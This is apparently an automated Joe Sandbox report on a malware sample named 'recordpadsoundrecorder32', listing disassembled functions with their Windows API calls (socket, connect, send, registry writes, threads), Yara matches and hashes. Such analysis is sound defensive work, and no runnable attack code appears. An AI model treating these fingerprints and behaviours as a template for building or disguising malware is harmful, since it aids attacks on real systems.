                                                                                      • Opcode ID: 5a43a15ff5a5ca394776d0fdc9f3345bd36dc59db38bc987700a322caba6ecc6
                                                                                      • Instruction ID: b208737111b6af8f368d68565e32be3d93763a0fe0496fbab0e7ce5e01f74e5c
                                                                                      • Opcode Fuzzy Hash: 5a43a15ff5a5ca394776d0fdc9f3345bd36dc59db38bc987700a322caba6ecc6
                                                                                      • Instruction Fuzzy Hash: 9A21ABB5A00644DFCB28CF68C584BABBBB5FF49314F11858AEC0997341D774E949DBA0
                                                                                      Function 02602EDD Relevance: 6.0, APIs: 4, Instructions: 49networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02602EEE
                                                                                      • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02602EFD
                                                                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02602F0C
                                                                                      • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02602F36
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$Socketsetsockopt
                                                                                      • String ID:
                                                                                      • API String ID: 2093263913-0
                                                                                      • Opcode ID: 43d6bf3f7bf07e38c26114162e61683aa2347a78e0f8c3361940ca068e1ec472
                                                                                      • Instruction ID: c3c701d36535ead5817eeb12183da8bfa8671865e846dab84e46840816a923f9
                                                                                      • Opcode Fuzzy Hash: 43d6bf3f7bf07e38c26114162e61683aa2347a78e0f8c3361940ca068e1ec472
                                                                                      • Instruction Fuzzy Hash: EF018871951204BBDB305F65DC88F9FBBA9EF89761F058569F908DB281D77088408BB0
                                                                                      Function 02602DB5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 02602D39: WSASetLastError.WS2_32(00000000), ref: 02602D47
                                                                                        • Part of subcall function 02602D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02602D5C
                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02602E6D
                                                                                      • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02602E83
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$Sendselect
                                                                                      • String ID: 3'
                                                                                      • API String ID: 2958345159-280543908
                                                                                      • Opcode ID: c9f355afa88ee2a3a8bf80be0010df0b0d1e3a069f21a7ce5602085dfa7338f0
                                                                                      • Instruction ID: 69e21f39a6669b63f33bc216646b3201d03dcd258c6b07f1ec7b58a75a442cf1
                                                                                      • Opcode Fuzzy Hash: c9f355afa88ee2a3a8bf80be0010df0b0d1e3a069f21a7ce5602085dfa7338f0
                                                                                      • Instruction Fuzzy Hash: 9F31B070A112099FDF19DFA0C8A8BEF7BAAAF05314F04455AEC05972C0E774A9959FA0
                                                                                      Function 02602AC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02602AEA
                                                                                      • connect.WS2_32(?,?,?), ref: 02602AF5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLastconnect
                                                                                      • String ID: 3'
                                                                                      • API String ID: 374722065-280543908
                                                                                      • Opcode ID: 6e00718d1df19c1413bb45f82be5638435ab161c1aba14e034a58ffca88d2026
                                                                                      • Instruction ID: 2ae1a886a5e9f4b322b3ffe59e4e3f196454529811da2d5c5f2585cc2264ba53
                                                                                      • Opcode Fuzzy Hash: 6e00718d1df19c1413bb45f82be5638435ab161c1aba14e034a58ffca88d2026
                                                                                      • Instruction Fuzzy Hash: BA21D770E01204ABCF18AFB4C598AAFBBBAAF45324F14459DEC19933C0DB745A419F94
                                                                                      Function 0040D3AB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLocalTime.KERNEL32(0040C2B8), ref: 0040D3C6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: LocalTime
                                                                                      • String ID: /chk$XiM#
                                                                                      • API String ID: 481472006-2768313731
                                                                                      • Opcode ID: 719ccb32c6d0f1224c08b4e1637f7109be7b56e533cc931ac7d4392f13334026
                                                                                      • Instruction ID: bfeb034239b7c7118683ac587487231c4a8ae608a4ee2d3b9eda992131e4dc08
                                                                                      • Opcode Fuzzy Hash: 719ccb32c6d0f1224c08b4e1637f7109be7b56e533cc931ac7d4392f13334026
                                                                                      • Instruction Fuzzy Hash: 4CE08630C18743E9D7117BA0CD088987FB1AB51314760463FE1A2754E1D73D549AEF4E
                                                                                      Function 0260353E Relevance: 4.6, APIs: 3, Instructions: 127COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 0afc1c5d77c07d77a1fa48a843dfdf3ba5404a11d1e38e2a9465414a52987d7c
                                                                                      • Instruction ID: fd96556776c3a594705b04fa8b60f7334925cd71c336d03e56ff7e336a78d42f
                                                                                      • Opcode Fuzzy Hash: 0afc1c5d77c07d77a1fa48a843dfdf3ba5404a11d1e38e2a9465414a52987d7c
                                                                                      • Instruction Fuzzy Hash: 925160B1905206DFCB09CF68C580AAEBBB1FF09311F14819DE8299B3D0D770A911DFA1
                                                                                      Function 0260369A Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 026036A7
                                                                                        • Part of subcall function 02602420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02602432
                                                                                        • Part of subcall function 02602420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02602445
                                                                                        • Part of subcall function 02602420: RtlEnterCriticalSection.NTDLL(?), ref: 02602454
                                                                                        • Part of subcall function 02602420: InterlockedExchange.KERNEL32(?,00000001), ref: 02602469
                                                                                        • Part of subcall function 02602420: RtlLeaveCriticalSection.NTDLL(?), ref: 02602470
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1601054111-0
                                                                                      • Opcode ID: cd7ebe9c79e16778245d2a35d45e30b49ea6e248932e766ddb5a5ed06979c40d
                                                                                      • Instruction ID: 58da807d47f698387e3f5afafd7acb2d74409cf6dce17dfa70483cd5b5ca6355
                                                                                      • Opcode Fuzzy Hash: cd7ebe9c79e16778245d2a35d45e30b49ea6e248932e766ddb5a5ed06979c40d
                                                                                      • Instruction Fuzzy Hash: 2211BFB5500209ABDB298E14CCC5FAB3B6AEF00355F10445AFE568A3D0C734E8B1EB98
                                                                                      Function 026120A0 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __beginthreadex.LIBCMT ref: 026120B6
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000002,0260A937,00000000), ref: 026120E7
                                                                                      • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,0260A937,00000000), ref: 026120F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandleResumeThread__beginthreadex
                                                                                      • String ID:
                                                                                      • API String ID: 1685284544-0
                                                                                      • Opcode ID: c1bbed272e0d9d7aba737bf68877f9d23d1e44b6b8637eb9282129d3b844d9f0
                                                                                      • Instruction ID: 914cdb31826d90d72aedd437ca049ea1f18a80b0b9fea5837fa62adb0ee384f5
                                                                                      • Opcode Fuzzy Hash: c1bbed272e0d9d7aba737bf68877f9d23d1e44b6b8637eb9282129d3b844d9f0
                                                                                      • Instruction Fuzzy Hash: 05F0C270340210ABE7209E6DDC84F95B3E8EF48725F28456AFA44C7380C771B896CA90
                                                                                      Function 02601AA9 Relevance: 4.5, APIs: 3, Instructions: 18networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InterlockedIncrement.KERNEL32(0263729C), ref: 02601ABA
                                                                                      • WSAStartup.WS2_32(00000002,00000000), ref: 02601ACB
                                                                                      • InterlockedExchange.KERNEL32(026372A0,00000000), ref: 02601AD7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Interlocked$ExchangeIncrementStartup
                                                                                      • String ID:
                                                                                      • API String ID: 1856147945-0
                                                                                      • Opcode ID: 31420bdff8e85f6231bb2dea3eb2c1d6e93837bfcdbfe0ea05228a51aa589bc6
                                                                                      • Instruction ID: de73b7f9f58a32d9f745d26f0ae6d27f43702cce965635cae4a3f49818aa3d79
                                                                                      • Opcode Fuzzy Hash: 31420bdff8e85f6231bb2dea3eb2c1d6e93837bfcdbfe0ea05228a51aa589bc6
                                                                                      • Instruction Fuzzy Hash: F9D05EB1D80A085BE33366A0AC8FEBDF76CFB06B11F400651FC6AC01C0EA50656885A6
                                                                                      Function 0040D460 Relevance: 4.5, APIs: 3, Instructions: 8registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegSetValueExA.KERNELBASE ref: 0040D460
                                                                                      • RegCloseKey.KERNELBASE(?), ref: 0040D469
                                                                                        • Part of subcall function 004022CB: WaitForSingleObject.KERNEL32(00000000,004090A8), ref: 0040D307
                                                                                      • ExitProcess.KERNEL32 ref: 0040DA91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseExitObjectProcessSingleValueWait
                                                                                      • String ID:
                                                                                      • API String ID: 2192842637-0
                                                                                      • Opcode ID: 1b9f23a41c0e40b0f9311fce3c8bd035e8c111fac712162ec3806c88e8d3c095
                                                                                      • Instruction ID: 6b2c0eb9daf1d9ed9b036e29818b5d03816b1997dab4dfffd8741184c018fce9
                                                                                      • Opcode Fuzzy Hash: 1b9f23a41c0e40b0f9311fce3c8bd035e8c111fac712162ec3806c88e8d3c095
                                                                                      • Instruction Fuzzy Hash: EBC048B5804400ABC7402BF0AF5D91D3E68BB0830AB12587DB682B00A28E7840499F2D
                                                                                      Function 02604BED Relevance: 3.1, APIs: 2, Instructions: 137COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02604BF2
                                                                                        • Part of subcall function 02601BA7: __EH_prolog.LIBCMT ref: 02601BAC
                                                                                        • Part of subcall function 02601BA7: RtlEnterCriticalSection.NTDLL ref: 02601BBC
                                                                                        • Part of subcall function 02601BA7: RtlLeaveCriticalSection.NTDLL ref: 02601BEA
                                                                                        • Part of subcall function 02601BA7: RtlEnterCriticalSection.NTDLL ref: 02601C13
                                                                                        • Part of subcall function 02601BA7: RtlLeaveCriticalSection.NTDLL ref: 02601C56
                                                                                        • Part of subcall function 0260E0A6: __EH_prolog.LIBCMT ref: 0260E0AB
                                                                                        • Part of subcall function 0260E0A6: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0260E12A
                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02604CF2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                      • String ID:
                                                                                      • API String ID: 1927618982-0
                                                                                      • Opcode ID: 3127796c0133c1879e9e0f5658a7a973c6a361d40f7a66da3bb94c4b89295f0a
                                                                                      • Instruction ID: 12978c8a72a1eedf2a5ef1bb20141df60fad5128f737b7d7c7dd863a0e633cd8
                                                                                      • Opcode Fuzzy Hash: 3127796c0133c1879e9e0f5658a7a973c6a361d40f7a66da3bb94c4b89295f0a
                                                                                      • Instruction Fuzzy Hash: 30513871D04248DFDB19DFA8C984AEEBBB5EF08310F14805EE905AB391DB309A44DF94
                                                                                      Function 02602D39 Relevance: 3.0, APIs: 2, Instructions: 50networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02602D47
                                                                                      • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02602D5C
                                                                                        • Part of subcall function 0260A4B7: WSAGetLastError.WS2_32(00000000,?,?,02602A51), ref: 0260A4C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$Send
                                                                                      • String ID:
                                                                                      • API String ID: 1282938840-0
                                                                                      • Opcode ID: 32f0ac22ec96d00c8c6d6ba2832389406d1ff6899159cdff3d3e1ce99f21d827
                                                                                      • Instruction ID: 5ea839dbba025957cfedef9b856ef05707cf55310c3c72677360a116b6dc24de
                                                                                      • Opcode Fuzzy Hash: 32f0ac22ec96d00c8c6d6ba2832389406d1ff6899159cdff3d3e1ce99f21d827
                                                                                      • Instruction Fuzzy Hash: 1F01B1B5401205AFDB245F94888886BBBECEF45360B24092EFC59832C0DB709D409B61
                                                                                      Function 02608398 Relevance: 3.0, APIs: 2, Instructions: 32networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WSASetLastError.WS2_32(00000000), ref: 026083B5
                                                                                      • shutdown.WS2_32(?,00000002), ref: 026083BE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLastshutdown
                                                                                      • String ID:
                                                                                      • API String ID: 1920494066-0
                                                                                      • Opcode ID: ba166645e1c6e1358e1a97f65daec9f6fb73f26c95d2f1f05470de10e974c165
                                                                                      • Instruction ID: 81ad0e7b50c9be14e06d56d6e1ce20af00c149655525b3293fbd35a94c21030a
                                                                                      • Opcode Fuzzy Hash: ba166645e1c6e1358e1a97f65daec9f6fb73f26c95d2f1f05470de10e974c165
                                                                                      • Instruction Fuzzy Hash: 5AF06D756417148FC728AF94E444B5BB7E5AF49320F05481CED95973C1D770AC408BA5
                                                                                      Function 00404034 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F4F,00000000), ref: 00404045
                                                                                        • Part of subcall function 00403EEC: GetVersionExA.KERNEL32 ref: 00403F0B
                                                                                      • HeapDestroy.KERNEL32 ref: 00404084
                                                                                        • Part of subcall function 0040440B: HeapAlloc.KERNEL32(00000000,00000140,0040406D,000003F8), ref: 00404418
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocCreateDestroyVersion
                                                                                      • String ID:
                                                                                      • API String ID: 2507506473-0
                                                                                      • Opcode ID: 785e23c1ed37029bd7fa1e4a136f418f238003ec06b3befa2c01f286c825b2ce
                                                                                      • Instruction ID: 795a75c142ce263548137c971673ec0d69254cf7c95aacf64765c85fef2462b4
                                                                                      • Opcode Fuzzy Hash: 785e23c1ed37029bd7fa1e4a136f418f238003ec06b3befa2c01f286c825b2ce
                                                                                      • Instruction Fuzzy Hash: E9F065F060530199DB205F749F45B2A35989BC0765F10453FFB40F41D0EB788481990E
                                                                                      Function 02605119 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260511E
                                                                                        • Part of subcall function 02603D7E: htons.WS2_32(?), ref: 02603DA2
                                                                                        • Part of subcall function 02603D7E: htonl.WS2_32(00000000), ref: 02603DB9
                                                                                        • Part of subcall function 02603D7E: htonl.WS2_32(00000000), ref: 02603DC0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: htonl$H_prologhtons
                                                                                      • String ID:
                                                                                      • API String ID: 4039807196-0
                                                                                      • Opcode ID: 96685b17a031563e52fb9cf6aae37606a27fecbf71e5f1921288e857fb080af4
                                                                                      • Instruction ID: bf4d608907021df93bacf02c8832144e5f24152bedddc5180c880007c438db77
                                                                                      • Opcode Fuzzy Hash: 96685b17a031563e52fb9cf6aae37606a27fecbf71e5f1921288e857fb080af4
                                                                                      • Instruction Fuzzy Hash: 69814971D0424E8ECF09DFE8D180AEEBBB5AF48314F20815AD851B7380EB755A05DFA9
                                                                                      Function 0263E77D Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindCloseChangeNotification.KERNELBASE(?,16049F3D), ref: 0265F814
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.000000000263A000.00000040.00001000.00020000.00000000.sdmp, Offset: 0263A000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_263a000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ChangeCloseFindNotification
                                                                                      • String ID:
                                                                                      • API String ID: 2591292051-0
                                                                                      • Opcode ID: 3c4d18e7bfe1cd9132d015755601739588dfa2b39a92e35f03a92d99e666ccc2
                                                                                      • Instruction ID: b39d2ad864f789e61074f6cc7d21fdeff4c0dcd733e43c4c1f243be26eccb2b0
                                                                                      • Opcode Fuzzy Hash: 3c4d18e7bfe1cd9132d015755601739588dfa2b39a92e35f03a92d99e666ccc2
                                                                                      • Instruction Fuzzy Hash: FB416CB250C6049FE709BF28D895779BBE5FB54310F060A3DE6C283740EA356944CB8B
                                                                                      Function 0263E69B Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindCloseChangeNotification.KERNELBASE(?,16049F3D), ref: 0265F814
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.000000000263A000.00000040.00001000.00020000.00000000.sdmp, Offset: 0263A000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_263a000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ChangeCloseFindNotification
                                                                                      • String ID:
                                                                                      • API String ID: 2591292051-0
                                                                                      • Opcode ID: 172c2e20020e0095825ac449459bebe9d73a3d856d639e3976f14e1e61c77f24
                                                                                      • Instruction ID: 66adfeb23f641a12360a9cf41db20d5cf8b0e52560b92b30a83be148ac945758
                                                                                      • Opcode Fuzzy Hash: 172c2e20020e0095825ac449459bebe9d73a3d856d639e3976f14e1e61c77f24
                                                                                      • Instruction Fuzzy Hash: 77314CB251C6009FE70DBF28CC95679BBE5FB69210F060A3DE6D283350EA356444CB4B
                                                                                      Function 0263E6FF Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindCloseChangeNotification.KERNELBASE(?,16049F3D), ref: 0265F814
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.000000000263A000.00000040.00001000.00020000.00000000.sdmp, Offset: 0263A000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_263a000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ChangeCloseFindNotification
                                                                                      • String ID:
                                                                                      • API String ID: 2591292051-0
                                                                                      • Opcode ID: 4e9b365c04a151068604c5e9ae79ebc7b4e58fc521cce118266fe5f1124640d2
                                                                                      • Instruction ID: 72a0bd9c53241e5e1d01a3de97c4035fc160c45d9ee10a50ceaef52143a97ccb
                                                                                      • Opcode Fuzzy Hash: 4e9b365c04a151068604c5e9ae79ebc7b4e58fc521cce118266fe5f1124640d2
                                                                                      • Instruction Fuzzy Hash: 17215EB251D6009FE70DBF28D89567ABBE5FB58210F06093DEAC283340EA356554C78B
                                                                                      Function 0260E96F Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260E974
                                                                                        • Part of subcall function 02601A01: TlsGetValue.KERNEL32 ref: 02601A0A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prologValue
                                                                                      • String ID:
                                                                                      • API String ID: 3700342317-0
                                                                                      • Opcode ID: 812db600b82636306e42b64210127904c387396c145259abfe5ff7f119499df0
                                                                                      • Instruction ID: 645d32439dfdeb273065768f253bb63fd426a804aaf816bdfd4aa73ceb0b599b
                                                                                      • Opcode Fuzzy Hash: 812db600b82636306e42b64210127904c387396c145259abfe5ff7f119499df0
                                                                                      • Instruction Fuzzy Hash: 16214FB2D04219AFDB08DFA4D580AFFBBF9EF48310F10452EE805A3280D775A901DBA5
                                                                                      Function 02678560 Relevance: 1.6, APIs: 1, Instructions: 68fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.000000000263A000.00000040.00001000.00020000.00000000.sdmp, Offset: 0263A000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_263a000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: eefd1e95fb316547433ebaadddf864f00d8e7a691ae25921879c6ab224b1dc3a
                                                                                      • Instruction ID: 981017347b2f85911804c433f8d6ee21102d84ca66dbc069719c3ca99b523be1
                                                                                      • Opcode Fuzzy Hash: eefd1e95fb316547433ebaadddf864f00d8e7a691ae25921879c6ab224b1dc3a
                                                                                      • Instruction Fuzzy Hash: 3311E2F3908624AFD3116A19DC417BABBE8DF95771F17052DEBC8D3740EA31484486D6
                                                                                      Function 026033B2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 026033CC
                                                                                        • Part of subcall function 026032AB: __EH_prolog.LIBCMT ref: 026032B0
                                                                                        • Part of subcall function 026032AB: RtlEnterCriticalSection.NTDLL(?), ref: 026032C3
                                                                                        • Part of subcall function 026032AB: RtlLeaveCriticalSection.NTDLL(?), ref: 026032EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                                      • String ID:
                                                                                      • API String ID: 1518410164-0
                                                                                      • Opcode ID: ab3715eb7cad401acac503ab8a37d20539cee5b0ed592313c4ae51ddeb109c25
                                                                                      • Instruction ID: 4f991c2001decb9976c0d582e849ddb48f9bce26105668e52cab9077034775f0
                                                                                      • Opcode Fuzzy Hash: ab3715eb7cad401acac503ab8a37d20539cee5b0ed592313c4ae51ddeb109c25
                                                                                      • Instruction Fuzzy Hash: F8014471614606AFD708DF59D8C5F56B7A9FF45321B10835DE828873D0EB70E821DBA4
                                                                                      Function 0265C99B Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.000000000263A000.00000040.00001000.00020000.00000000.sdmp, Offset: 0263A000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_263a000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: 9bd76a525ab7b5bae434e1f4c770649cafdabfffca845ef534a87c28b273427e
                                                                                      • Instruction ID: d347bfc3b6ea444fc54137c33d9f03f60a08c80690db1097bbabfe65e265d4d9
                                                                                      • Opcode Fuzzy Hash: 9bd76a525ab7b5bae434e1f4c770649cafdabfffca845ef534a87c28b273427e
                                                                                      • Instruction Fuzzy Hash: 550117B250C604EFE3056F09DC81A6EFBE9EFA5710F06482DEAD483310E771A850DA57
                                                                                      Function 0260E4FF Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260E504
                                                                                        • Part of subcall function 026026DB: RtlEnterCriticalSection.NTDLL(?), ref: 02602706
                                                                                        • Part of subcall function 026026DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 0260272B
                                                                                        • Part of subcall function 026026DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02625B03), ref: 02602738
                                                                                        • Part of subcall function 026026DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02602778
                                                                                        • Part of subcall function 026026DB: RtlLeaveCriticalSection.NTDLL(?), ref: 026027D9
                                                                                      Memory Dump Source
